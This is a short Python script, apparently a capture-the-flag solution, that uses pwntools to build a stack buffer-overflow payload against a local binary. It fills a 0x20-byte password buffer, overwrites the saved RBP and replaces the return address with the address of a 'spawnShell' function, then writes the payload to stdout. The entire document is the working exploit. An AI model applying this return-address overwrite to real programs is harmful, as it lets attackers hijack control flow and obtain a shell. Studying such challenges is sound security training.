from pwn import *

e = ELF('./bin')
win = e.symbols['spawnShell']

pl = b'A' * 0x20  # Fill the password buffer
pl += b'B' * 8  # Saved RBP
pl += p64(win)  # overwrite return address with address of win

sys.stdout.buffer.write(pl)